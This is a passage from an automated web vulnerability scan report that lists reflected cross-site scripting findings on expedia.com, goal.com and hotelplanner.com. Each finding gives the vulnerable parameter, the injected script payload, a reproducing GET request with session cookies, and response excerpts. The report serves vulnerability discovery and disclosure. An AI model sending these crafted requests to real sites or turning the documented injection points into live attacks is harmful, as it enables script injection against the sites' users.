Set-Cookie: p1=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:23 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:23 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:23 GMT; Path=/
Content-Length: 590270

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
<input type="hidden" value="Boston,United States56895"><script>alert(1)</script>39b5d7891f9b1da0d" name="inpCityForHotelGroup" id="inpCityForHotelGroup" />
...[SNIP]...
4.237. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The value of the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity request parameter is copied into the HTML document as plain text between tags. The payload 1f820<script>alert(1)</script>fc98f5f61bc4a03a9 was submitted in the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_hotelRegionTypeControl_inpRegionType=CITY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity=1f820<script>alert(1)</script>fc98f5f61bc4a03a9&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCityRegionId=&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpStartDate=10%2F04%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpEndDate=10%2F07%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_hotelRoomCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_adultCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_childCountInput=0&isAdditionOptionExist=0&postRedirect=1&olacid=US.BD.IGOUGO-US.HOTEL.HOTEL HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:12:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: p1=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:52 GMT; Path=/
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:52 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:12:52 GMT; Path=/
Content-Length: 50057

<!DOCTYPE html><DIV ID="interstitialServerPush1" style="display:block">

<!--Table here is required so that we can center the page in all displays-->
<table class="basicInterstialWidget" border="0
...[SNIP]...
<div class="pageHeadingDisambigB">
Please help us with your request for &quot;1f820<script>alert(1)</script>fc98f5f61bc4a03a9&quot;
    </div>
...[SNIP]...
4.238. http://www.goal.com/en/comment/comments-box [allCommentsUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goal.com
Path:   /en/comment/comments-box

Issue detail

The value of the allCommentsUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c81"><script>alert(1)</script>fbfcf081cf0 was submitted in the allCommentsUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/comment/comments-box?allCommentsUrl=%2Fen%2Fnews%2F9%2Fengland%2F2011%2F10%2F01%2F2691360%2Fanderson-confident-manchester-united-will-keep-unbeaten-run%2Fcomments82c81"><script>alert(1)</script>fbfcf081cf0&entityId=13994828 HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1479357280-1317599429942; __utma=167609825.336600251.1317599442.1317599442.1317599442.1; __utmb=167609825.1.10.1317599442; __utmc=167609825; __utmz=167609825.1317599442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _em_hl=1; _em_vt=6b3bfb104abb2666e789b9e202024e62e18088e413-981323754e88f8d5; _em_v=cf9911b66e4d49b949eaf13bd6fa4e88f8d57af834-210214684e88f8d5; l=en

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0,must-revalidate,s-maxage=300
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Mon, 03 Oct 2011 00:00:33 GMT
Expires: Sun, 02 Oct 2011 00:00:33 +0000
Server: Apache/2.2.3 (Red Hat)
X-Goal-Flavors: ad970x40navbar
Content-Length: 7267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
<input name="allCommentsUrl" type="hidden" value="/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run/comments82c81"><script>alert(1)</script>fbfcf081cf0" />
...[SNIP]...
4.239. http://www.goal.com/en/teams/england/97/man-utd-news [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.goal.com
Path:   /en/teams/england/97/man-utd-news

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b508'%3bf2775266eeb was submitted in the REST URL parameter 5. This input was echoed as 6b508';f2775266eeb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/teams/england/97/man-utd-news6b508'%3bf2775266eeb HTTP/1.1
Host: www.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0,must-revalidate,s-maxage=600
Content-Language: en
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:54:56 GMT
Expires: Sat, 01 Oct 2011 23:54:56 +0000
Server: Apache/2.2.3 (Red Hat)
X-Goal-Flavors: ad970x40navbar,turkishair,epleague
Content-Length: 156117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr" lang="en">

...[SNIP]...
vascript" src="http://ad.doubleclick.net/adj/');document.write('gna.en/level2;tile=' + dblClickIndex + ';sz=728x90;ord=' + ord + '?area=2l&pos=1&team=manu&league=epl&pagetype=team&teamname=man-utd-news6b508';f2775266eeb&ord=' + ord + '">
...[SNIP]...
4.240. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /ClickThrough.cfm

Issue detail

The value of the Source request parameter is copied into an HTML comment. The payload ec609--><script>alert(1)</script>6680255e979 was submitted in the Source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ClickThrough.cfm?Source=IGoUGoec609--><script>alert(1)</script>6680255e979 HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
================================================
Date: {ts '2011-10-02 19:10:31'}
==========================================================
Page: www.hotelplanner.com/ClickThrough.cfm?Source=IGoUGoec609--><script>alert(1)</script>6680255e979
==========================================================

Browser: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
IP: 50.23.123
...[SNIP]...
4.241. http://www.hotelplanner.com/ClickThrough.cfm [Source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /ClickThrough.cfm

Issue detail

The value of the Source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b90d"><script>alert(1)</script>0f7ca1148eb was submitted in the Source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ClickThrough.cfm?Source=IGoUGo5b90d"><script>alert(1)</script>0f7ca1148eb HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; LANGUAGE=1; SOURCECODE=IGoUGo

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:10:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/ClickThrough.cfm?Source=IGoUGo5b90d"><script>alert(1)</script>0f7ca1148eb', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.242. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the NumRooms request parameter is copied into an HTML comment. The payload 93c35--><img%20src%3da%20onerror%3dalert(1)>e7ec9d7eeee was submitted in the NumRooms parameter. This input was echoed as 93c35--><img src=a onerror=alert(1)>e7ec9d7eeee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=193c35--><img%20src%3da%20onerror%3dalert(1)>e7ec9d7eeee&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 193c35--><img src=a onerror=alert(1)>e7ec9d7eeee cannot be converted to a number. <br>
...[SNIP]...
4.243. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the NumRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aacd"><script>alert(1)</script>dc4429b387f was submitted in the NumRooms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=16aacd"><script>alert(1)</script>dc4429b387f&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<a href="/" onmouseout="addthis_close()" onclick="return addthis_open(this, '', 'http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=16aacd"><script>alert(1)</script>dc4429b387f&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab', 'HotelPlanner.com Group Hotel Rates & Group Travel')">
...[SNIP]...
4.244. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [NumRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the NumRooms request parameter is copied into the HTML document as plain text between tags. The payload ee4c1<img%20src%3da%20onerror%3dalert(1)>2c29a2f448 was submitted in the NumRooms parameter. This input was echoed as ee4c1<img src=a onerror=alert(1)>2c29a2f448 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1ee4c1<img%20src%3da%20onerror%3dalert(1)>2c29a2f448&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<font color="FFFFFF">The value 1ee4c1<img src=a onerror=alert(1)>2c29a2f448 cannot be converted to a number. <br>
...[SNIP]...
4.245. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hotelID request parameter is copied into the HTML document as plain text between tags. The payload d2b59<img%20src%3da%20onerror%3dalert(1)>5dfd56ea543 was submitted in the hotelID parameter. This input was echoed as d2b59<img src=a onerror=alert(1)>5dfd56ea543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791d2b59<img%20src%3da%20onerror%3dalert(1)>5dfd56ea543&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:31:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<font color="FFFFFF">The value 113791d2b59<img src=a onerror=alert(1)>5dfd56ea543 cannot be converted to a number. <br>
...[SNIP]...
4.246. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The value of the hotelID request parameter is copied into an HTML comment. The payload 13eff--><img%20src%3da%20onerror%3dalert(1)>68159f7f99a was submitted in the hotelID parameter. This input was echoed as 13eff--><img src=a onerror=alert(1)>68159f7f99a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=11379113eff--><img%20src%3da%20onerror%3dalert(1)>68159f7f99a&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:31:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 11379113eff--><img src=a onerror=alert(1)>68159f7f99a cannot be converted to a number. <br>
...[SNIP]...
4.247. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm [hotelID parameter]  previous  next

Summary

